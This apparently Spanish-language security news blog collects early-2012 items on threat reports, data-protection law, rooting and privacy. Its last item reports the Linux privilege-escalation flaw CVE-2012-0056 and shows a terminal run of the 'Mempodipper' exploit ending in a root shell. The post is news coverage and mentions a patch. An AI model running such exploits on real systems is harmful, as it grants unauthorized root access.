Symantec Endpoint Security Best Practices Survey - Global Key Findings January 2012

Symantec’s 2012 Endpoint Security Best Practices Survey, found key differences between organizations that proactively focus on endpoint protection and those that don’t. It’s common knowledge that adhering to best security practices should result in a lower volume of cyber attacks and less downtime for an organization. Responses clearly demonstrated that organizations deploying more comprehensive security technologies and practices were more prepared, better equipped to thwart attacks, and faced fewer losses. 

 

View more presentations from Symantec

Informe Global de Riesgo 2012 [ Foro Mundial de Economia ]

World Economic Forum - Global Risks 2012 - Seventh Edition

Economic imbalances and social inequality risk reversing the gains of globalization, warns the World Economic Forum in its report Global Risks 2012. These are the findings of a survey of 469 experts and industry leaders, indicating a shift of concern from environmental risks to socioeconomic risks compared to a year ago. Respondents worry that further economic shocks and social upheaval could roll back the progress globalization has brought, and feel that the world’s institutions are ill-equipped to cope with today’s interconnected, rapidly evolving risks. The findings of the survey fed into an analysis of three major risk cases: Seeds of Dystopia; Unsafe Safeguards and the Dark Side of Connectivity. The report analyses the top 10 risks in five categories - economic, environmental, geopolitical, societal and technological - and also highlights "X Factor" risks, the wild card threats which warrant more research, including a volcanic winter, cyber neotribalism and epigenetics, the risk that the way we live could have harmful, inheritable effects on our genes. Key crisis management lessons from Japan’s earthquake, tsunami and nuclear disasters are highlighted in a special chapter.

 

Móviles Android Hacer ROOT al terminal podría ser declarado ilegal en EE.UU

Cuando una persona que realmente quiere exprimir un terminal recibe un móvil o tablet nuevo en sus manos una de las primeras cosas que hará en la inmensa mayoría de los casos será la de conseguir el acceso ROOT para tener una acceso total al dispositivo. Esta acción nos permite eliminar aplicaciones no deseadas en nuestros terminales o hacer tetherin sin que la operadora nos obligue a una tarifa especial, entre muchas otras opciones.

Sin embargo, a las empresas no parece gustar mucho el que los usuarios dispongan de la total libertad a la hora de quitar restricciones a sus terminales, alegando que vulneran la legislación en el país. En España lo más que nos podrían hacer en caso de hacer ROOT es revocarnos la garantía, cosa que es medianamente asumible, pero al otro lado del atlántico, podría acarrear consecuencias mucho peores.

Las empresas alegan que tanto hacer ROOT a dispositivos Android como jailbreak a los dispositivos iOS viola la Sección 1201 de la Digital Millennium Copyright Act (DMCA). Con esta ley de por medio los fabricantes podrían denunciar a los usuarios especificando la modificación del software puede violar derechos de propiedad intelectual y algunas patentes como suele ser normal en susodicho país.

Esta noticia no ha pasado precisamente desapercibida y la Electronic Frontier Foundation, una fundación con un gran respeto entre la comunidad tecnológica de Estados Unidos y firme defensora de la libertad del software, ha inciado una campaña para pedir la anulación de esta sección para proteger al usuario ante una práctica que, se mire como se mire, es abusiva con los consumidores.

Vía | Electronic Frontier Foundation


Visto en www.xatakandroid.com

Security Threat Report 2012 [Sophos]

BOSTON, MA – January 25, 2012 – IT security and data protection company Sophos today unveiled its latest Security Threat Report 2012, a detailed assessment of the threat landscape—from hacktivism and online threats to mobile malware, cloud computing and social network security, as well as IT security trends for this coming year. 

A Sophos poll, conducted online at the end of 2011, surveyed more than 4,300 global respondents about today’s biggest threats on the internet. Key findings from the research include:

• 61 percent feel that the biggest threat on the internet is users not doing enough to protect themselves 
• Nearly 20 percent believe social networking scams are the top threat 
• 67 percent think that malware is on the rise compared to in 2010

Year in Review: Under Attack

2011 was characterized by a rise in cybercrime. The availability of commercial tools designed by and for cybercriminals made mass generation of new malicious code campaigns and exploits trivial and scalable. The net result was significant growth in the volume of malware and infections. Cybercriminals also diversified their targets to include new platforms, as business use of mobile devices accelerated. Politically motivated “hacktivist” groups took the media spotlight, even as the more common threats to cyber security grew.

Hype over Hacktivism

In 2011, the emergence of LulzSec and Anonymous marked a shift from hacking for financial gain to hacking as a form of protest. Hacktivists sowed chaos by leaking documents and attacking websites of high-profile organizations and even defense contractors. LulzSec dominated headlines in the first half of the year with attacks on Sony, PBS, the U.S. Senate, the CIA, FBI affiliate InfraGard and others, and then disbanded after 50 days.

Risky Business

Increasingly, corporate users weren’t just at home or at work, but somewhere else on the “everywhere network.” And the consumerization of IT, sometimes called “bring your own device” or BYOD, became one of the newer causes of data vulnerability. Employees accessed sensitive corporate information from their home computers, smartphones and tablets. Moreover, corporate-issued mobile devices increased risk, as did the rise of cloud services and the use of social media.

According to the Sophos online poll, which asked users if their company allows personal laptops, desktops or phones for work, nearly 50 percent of respondents said yes. Another 10 percent who said their company doesn’t allow personal devices for work preferred they did.

Changing Web Threats and Drive-by Downloads

Cybercriminals constantly launched attacks designed to penetrate digital defenses and steal sensitive data. Almost no online portal proved immune from threat or harm. SophosLabs identifies an average of 30,000 newly-infected web pages each day. More than 80 percent of these web pages are on innocent web servers, which have been hacked by cybercriminals to make them part of the problem.

Additionally, 85 percent of all malware, including viruses, worms, spyware, adware and Trojans, comes from the web, according to the Ponemon Institute. Today, drive-by downloads have become the top web threat, and in 2011, one crimeware kit, known as “Blackhole,” rose to the number one on that list.

In the Sophos online poll, users were asked about the prevalence of malware compared to 2010; 67 percent of respondents felt it was on the rise.

OS Oh My! And the Emergence of Mac Malware

Microsoft Windows may be the most attacked operating system (OS), but the primary vectors for hacking Windows have been through PDF or Flash. Despite Microsoft’s regular updates to patch Windows OS vulnerabilities, the content delivery systems remained the largest vulnerability on any OS. In 2011, the emergence of malware for the Mac upstaged Windows malware. There's no doubt that the Windows malware problem is much larger than the Mac threat, but the events of 2011 show Mac users that the malware threat is genuine.

Download

The full Security Threat Report 2012 contains more information and statistics on cybercrime in 2011, as well as top tips and predictions for emerging trends.




Link relacionado:
- El 61% de los internautas piensa que la mayor amenaza de la Red son los usuarios que no se protegen

El Perú aún tiene un largo camino hacia la seguridad corporativa

Lima.- Cuando mencionamos o conversamos acerca de la seguridad corporativa, debemos, necesariamente referirnos a los Sistemas de Gestión de Seguridad de la Información (SGSI). A través de la adopción de un SGSI las compañías mejoran su productividad, competitividad, su capacidad de reducir, mitigar o evitar incidentes al igual como ofrecer garantías a sus empleados, clientes y socios de negocio como elemento referenciador. Según Andréz Lamouroux, Consultor Especialista en Seguridad de la Información y Gerente de Soluciones de Seguridad de Aranda Software, debemos ser precisos y certeros al momento en que buscamos soluciones globales para cuidar el mayor activo del negocio, como lo es la información corporativa. "Ante las circunstancias actuales, en donde la información es el valor del negocio y empresas de alcance mundial sufren ataques cibernéticos y podemos ser víctimas del robo de la información, es imprescindible que las compañías evalúen los riesgos asociados y establezcan las estrategias y controles adecuados que aseguren una permanente protección y salvaguarda de la data", asegura Lamouroux.

El presente y el futuro del robo cibernético

Muchas entidades locales e internacionales han sabido tomar conciencia de la importancia, no solo de cuidar la data vital de las empresas, sino también de asegurarse el futuro de la misma en un sistema competitivo. Por tal motivo, ya se encuentran actualizando sus sistemas y plataformas para enfrentar mejor los ataques e incidentes relacionados en seguridad de la información. Actualmente Perú ocupa el quinto puesto en el ranking de ataques de robo cibernético en Latinoamérica detrás de México, Brasil y Colombia.

Según afirma Andréz Lamouroux, el aumento se debe al crecimiento de la población y de la penetración de internet en la región, además de la realidad económica peruana, la cual ha sido lo suficiente estable como para motivar el interés para realizar ataques de fraude y robo cibernético. Otra realidad de importancia que se puede mejorar para futuros ataques cibernéticos son las soluciones que las entidades bancarias brindan a los usuarios, localmente, el Perú no esta acostumbrado a conocer y explorar todas distintas formas de fraude o de robo de identidad, no estamos aun preparados para afrontar y cuidar nuestra información privada.

De igual forma deben invertir en cambiar sus sistemas de seguridad y pasar a plataformas más seguras que permitan implementar múltiples algoritmos en sus sistemas de autenticación.

Las buenas prácticas

La certificación en la norma ISO 9001 es un elemento que hoy en día cualquier compañía u organización no puede obviar si quiere garantizar la calidad en sus productos y/o servicios. En la actualidad, solo el 20% ó 25% de organizaciones que operan en Perú han implementado la norma, en donde el mayor porcentaje lo comprenden organizaciones que reportan sus estados financieros al extranjero.

Actualmente, la Norma Técnica Peruana ISO/IEC 17799 (Código de Buenas Prácticas para la Gestión de la Seguridad de la Información) es de implementación obligatoria en todas las instituciones públicas del Perú desde agosto del 2004, El pasado 21 de julio del 2011, la Presidencia del Consejo de Ministros del Perú (PCM) mediante la Resolución Ministerial N° 197-2011-PCM, estableció que 50 Organismos e Instituciones Públicas del Perú deberán implementar el Plan de Seguridad de la Información indicado en la norma NTP ISO/IEC 17799 (ahora ISO 27002), antes del 31 de Diciembre del presente año. Entre los 50 organismos, se listan del Poder Legislativo, Poder Judicial, Organismos Autónomos y Poder Ejecutivo.

Más...

Visto en www.agenciaorbita.org

Guía para entender la nueva norma europea de protección de datos

La EU obligará a todas las empresas a reforzar sus garantías de privacidad y amenaza a quien no lo cumpla con multas de hasta el 5% de sus ingresos globales.

Google se ha adelantado a la futura aprobación de la nueva normativa de la Unión Europea en materia de protección de datos. La puntocom es consciente de que su hegemonía en el mercado de publicidad en buscadores provoca suspicacias en el organismo europeo, y ha decidido simplificar el modo en que informa a los usuarios sobre la información que recoge y sobre cómo la usa.

Y no es para menos. Bruselas asegura que habrá multas muy severas (de hasta el 5% de la facturación global durante el periodo correspondiente) para quien incumpla sus nuevas normas, ya sea una gran multinacional o una pequeña start-up.

La nueva normativa sustituirá a todas las leyes nacionales anteriores y a la Directiva 95/46 de Protección de Datos de la UE, que ha sido parte importante de la legislación europea sobre privacidad y derechos humanos, y bajo la que se han regido las empresas europeas desde 1995. La controvertida propuesta incluye varios puntos, algunos muy positivos, pero otros de efectividad más bien dudosa.

A favor…
1. Unificará las diferentes normativas nacionales en Europa en material de protección de datos, lo que beneficiará, sobre todo, a los gigantes como Google, Microsoft, Amazon o Apple. Un reciente estudio de Accenture afirmaba que la armonización de las leyes en Europa relacionadas con el comercio electrónico ayudaría a impulsar éste hasta un 25%. Según el vicepresidente de la Comisión Europea, Viviane Reding, “esta fragmentación supone para las empresas un coste adicional de 2,3 millones de euros”.

2. Tanto las autoridades relevantes en protección de datos, como todos los particulares afectados, tienen que ser notificados en el plazo de 24 horas acerca de cualquier fallo en la gestión de los datos, incluyendo su destrucción no autorizada o su pérdida. Las autoridades en materia de protección de datos tienen que ser notificadas, incluso en el caso de que no haya habido ningún riesgo de que los datos resultaran dañados. “Esto podría contribuir a generar una mayor responsabilidad entre las empresas y obligar a que éstas reconozcan e informen acerca de fallos de seguridad en el tratamiento de los datos que manejan”, destacan desde la firma estadounidense Iron Mountain.

3. “Se sabe ya que la nueva ley reducirá los requisitos burocráticos de obligado cumplimiento para muchas empresas”, añaden en Iron Mountain.

 … Y en contra

1. Esta propuesta contiene novedades muy importantes respecto a la directiva que pretende sustituir, aunque no tantas respecto a la normativa española de protección de datos. Desde la asociación aDigital, advierten que “la amplia definición de que es lo que se considera dato de carácter personal pueden significar una merma en la capacidad de las empresas y de cualquier otro organismo para tratar datos de carácter personal, con las negativas consecuencias que ello pueda tener para la economía”.

2. A nivel internacional, surgen otras dudas: “La gran cuestión es si la comunidad empresarial querrá o será capaz de auto controlarse”, comenta Christian Toon, director de seguridad de la información de Iron Mountain Europe. “En el caso de que no pudiera, las empresas se verían expuestas a inspecciones regulares por parte de las autoridades oficiales”.

3. “La definición de brecha tendrá también que quedar clara. ¿Dependerá del número de archivos o documentos afectados, por ejemplo, o del tipo de información que ha estado en peligro? Las empresas deberían prepararse para ambas opciones”, agrega Toon.

4. La figura del responsable de protección de datos será obligatoria para todos los organismos públicos y todas las empresas con más de 250 empleados, una medida que ya se cumple, por ejemplo, en Alemania. No obstante, en España, esto podría significar tener que incurrir en costes no previstos.

5. Se prohíbe el uso de datos personales para acciones de márketing, lo que podría frenar el desarrollo de nuevas modalidades publicitarias y de otras soluciones innovadoras.

6. Se advierte de que habrá un mayor control sobre los datos recopilados en Europa a países externos de la Unión Europea, pero el borrador no llega a concretar las actuaciones concretas previstas en estos casos. Son muchas las empresas españolas que han contratado sus servidores en EEUU, por una cuestión de precio.

Primeros efectos
La nueva normativa, que se publicará previsiblemente el 25 de enero, tardará aún unos dos años en ser aprobada, pues aún tiene por delante un largo proceso administrativo y necesita la aprobación de todos los Estados miembros. No obstante, sus efectos se sienten ya en el mercado. Además de los cambios introducidos por Google, Facebook ha presentado un informe, aparentemente dirigido a la UE, en el que afirma contribuir a la creación de 232.000 puestos de trabajo en el continente.

Por su parte, Microsoft ha hecho pública una encuesta internacional en la que se concluye que sólo menos de la mitad de las personas es consciente de las consecuencias a largo plazo que pueden tener sus actividades en la red en su reputación online o en la de terceros.


Fuente: 25.01.2012 Elena Arrieta. Madrid - Expansion.com


Link relacionado:
- Las empresas tendrán que adaptarse a la nueva normativa en materia de protección de datos de la Unión Europea

Las 5 principales amenazas para la seguridad en 2012 segun Netasq

Las amenazas basadas en Internet móvil probablemente se convertirán en un problema importante, tarde o temprano, según NETASQ

NETASQ ha hecho público un informe que hace referencia a las cinco principales amenazas para la seguridad en 2012, acompañado de consejos prácticos para hacerles frente. En esta época del año, es tradicional que los proveedores de seguridad miren sus respectivas bolas de cristal para elaborar predicciones en torno a las amenazas que se vivirán durante el año. En general, estos informes se basan en una extrapolación de las tendencias de ataques acontecidas en el último año (por ejemplo, la continúa explotación de vulnerabilidades Web 2.0), combinado con las tendencias del sector, más importantes (por ejemplo, la proliferación rápida de los dispositivos móviles en el lugar de trabajo). Por tanto, no se requiere de una habilidad especial para predecir que las amenazas basadas en Internet móvil se convertirán en un problema importante, tarde o temprano.

Principales peligros en 2012

1.- La Gestión de Vulnerabilidades continúa siendo la principal prioridad. Como punto de partida, es razonable suponer que todos los tipos de amenazas encontradas en el año 2011 continuarán produciéndose a lo largo de 2012. Y puesto que la gran mayoría de las infecciones de malware seguirán proviniendo de exploits conocidos para los que ya existen parches (XSS, inyección SQL, escalado (traversal) de directorio, etc.), la gestión de vulnerabilidades debe seguir siendo una de las primeras prioridades para todos los profesionales de la seguridad. Además de esta gestión de parches básicos, es importante recalcar que, durante 2011, un número preocupante de intrusiones en la red se produjo a causa de errores que podían haberse subsanado fácilmente como cortafuegos mal configurados o contraseñas débiles. Sirva como ejemplo citar una intromisión de alto perfil en Italia que se produjo tras adivinarse el nombre de usuario "admin" y la contraseña, que resultó ser el propio nombre de la empresa. Tal descuido en IT sería equivalente a "bloquear la puerta principal, dejando las ventanas abiertas”. 

2. Ingeniería Social (Medios Sociales) Aunque la ingeniería social no es un concepto novedoso, el aumento exponencial en la adopción de las redes de comunicación social - tanto dentro como fuera de la empresa - ha incrementado dramáticamente su eficacia y uso. La respuesta a esto tiene que venir dada por una combinación de la adecuada formación de los usuarios y del control de aplicaciones en el perímetro de la red o en el firewall. Sin embargo, a medida que más empresas empiecen a explotar el potencial de las redes sociales para acciones de marketing y otros usos de negocio, el simple bloqueo de aplicaciones tales como Facebook tendrá que dar paso a un análisis más inteligente del flujo de datos con la detección de amenazas y la eliminación de estas sobre la marcha. 

3. Los ataques dirigidos / Amenazas Persistentes Avanzadas / Hacktivismo 

Además de las motivaciones financieras habituales - el robo directo de datos u obstrucción a la competencia - estamos viviendo un aumento en la piratería relacionada con el activismo político, a veces denominado hacktivismo. Ya sean patrocinados por diferentes gobiernos, o por la acción de grupos independientes, como Anonymous o Lulzsec, estos ataques han servido, no obstante, para incrementar la sensibilidad y concienciación de la seguridad informática. Ahora bien, todavía está por ver sí este aumento de la conciencia se equiparará con un incremento acorde de los presupuestos de seguridad. La otra consecuencia de esta creciente complejidad de las amenazas será una continua reducción en la efectividad de las firmas de ataque específicas. A pesar de los mejores esfuerzos de los investigadores de seguridad de todo el mundo, cualquier estrategia de defensa demasiado dependiente de la detección por firmas específicas está condenada a fallar.

4. Los primeros en adoptar IPv6 podrían tener problemas 

En opinión de NETASQ, la adopción de IPv6 será mucho más lenta de lo que muchos están prediciendo y una de las razones para esto serán los problemas que experimentarán los primeros en adoptar la tecnología. Tal como se explica en un blog reciente de NETASQ (http://trial.netasq.com/Blog/bid/112217/IPv6-security-shall-we-wait-or-not), “la migración a IPv6, en lugar de traer la tan esperada seguridad inherente que se nos prometió, introducirá nuevas vulnerabilidades sí se realiza demasiado pronto”. Así, NETASQ aconseja a los clientes actuales esperar para realizar la migración a IPV6, por lo menos, durante el próximo año; y planificar durante ese tiempo una transición controlada una vez que la mayoría de los nuevos problemas tecnológicos de seguridad hayan sido identificados y mitigados.

5. SCADA (Supervisory Control and Data Acquisition- Control de Supervisión y Adquisición de Datos) 

 Los ataques se incrementarán Tanto Stuxnet como el igualmente devastador Duqu han causado estragos en todo el sector. No obstante, el sistema de control industrial conocido como SCADA, ha resultado ser especialmente vulnerable debido a su relativa antigüedad y a una capa de protección de seguridad bastante débil. Por su propia naturaleza como parte integral de muchos procesos industriales importantes tales como generación de energía, SCADA, no sólo ha sido un blanco fácil, sino también muy atractivo. Esta tendencia, por lo tanto, es posible que aumente durante 2012, por lo que los profesionales de seguridad responsables de estos sistemas harían bien en mantener sus sistemas de prevención de intrusiones actualizados, y, tal vez, mejorar sus defensas de seguridad perimetral para identificar estos ataques, según sea necesario. 

Fuente Newsletter E.Security

 Link relacionado:
- Security pioneer NETASQ offers practical advice for Top 5 security threats faced in 2012

El uso del P2P crece en Europa tras el cierre de Megaupload

El cierre de Megaupload ha vuelto la mirada de los internautas a los sistemas de intercambio de archivos P2P cuyo uso había descendido a favor el streaming (visionado sin descarga) o de la descarga directa. Frente a la plataforma de Megaupload que centralizaba el albergue de los archivos en sus servidores, lo que facilita su persecución, las plataformas P2P descentralizadas dificultan operaciones parecidas. Por otra parte, en algunos países como Francia, donde la ley persigue directamente el empleo de P2P se había producido una emigración hacia otro tipo de recursos. Las estadísticas no precisan el tipo de uso que se hace de las distintas alternativas.

La frecuentación de los sistemas P2P ha crecido desde la semana pasada en Europa, al menos temporalmente. Es lo que demuestran las estadísticas de Inoque, que analiza el tipo de paquetes que circulan por la Red. El recurso al P2P en Europa ha crecido. En un cuadro se aprecia como de tener un porcentaje irrelevante el tráfico de paquetes P2P sube el día 20 y durante tres días roza el 15% del porcentaje total. El empleo del streaming, que superaba el 60 % un día antes del cierre de Megaupload,  registra un descenso los dos días siguientes para volver a recuperar posiciones después.

 Estadísticas europeas sobre tráfico de Internet. El 20 de enero, los paquetes P2P aumentan

Más...

Fuente: tecnologia.elpais.com

Google cambia su política de privacidad y unificará la información personal de los usuarios

Google ha modificado sus políticas de privacidad para poder unificar todos los datos que posee de los usuarios de sus distintos productos y ofrecer “servicios más intuitivos y personalizados”. Los cambios, obligados para todos los usuarios, entrarán en vigor el 1 de marzo. 

En su blog oficial, la compañía ha anunciado que la refundición de más de 60 políticas de privacidad ahora vigentes en diversos servicios en una sola le permitirá unificar todos los datos de sus usuarios y ofrecer “servicios más intuitivos” y adaptados a las preferencias de cada uno de ellos. Asimismo, Google ha revisado y abreviado sus condiciones de servicio.

Más...

Visto en www.networkworld.es

Vulnerabilidad linux: Escalada de privilegios con /proc/pid/mem write

CVE-2012-0056 $ ls
build-and-run-exploit.sh  build-and-run-shellcode.sh  mempodipper.c 

shellcode-32.s  shellcode-64.s
CVE-2012-0056 $ gcc mempodipper.c -o mempodipper
CVE-2012-0056 $ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6454/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x402178.
[+] Seeking to offset 0x40216c.
[+] Executing su with shellcode.
sh-4.2# whoami
root
sh-4.2#

Un experto en informatica ha encontrado como conseguir privilegios de superusuario desde una cuenta de usuario comun, claro ya para esto hay un parche por fortuna.

La vulnerabilidad reside en el acceso en /proc/pid/mem, al parecer no está muy bien gestionado y que a través de cierto tipo de accesos podamos conseguir privilegios de superusuario.

La explicación completa está en http://blog.zx2c4.com/749 (en ingles) en donde este experto ha explicado cómo funciona el exploit para la vulnerabilidad con número CVE-2012-0056, además de ofrecer un programa que la explota llamada Mempodipper, disponible en el repositorio git de ese usuario.

Todos los kernels Linux 2.6.39 y superiores (incluyendo la serie 3.x) son vulnerables al exploit, aunque Linus ya publicó una corrección al problema hace unos días.

Más...


Fuente:ANIME LINUX STYLE IN THE WORLD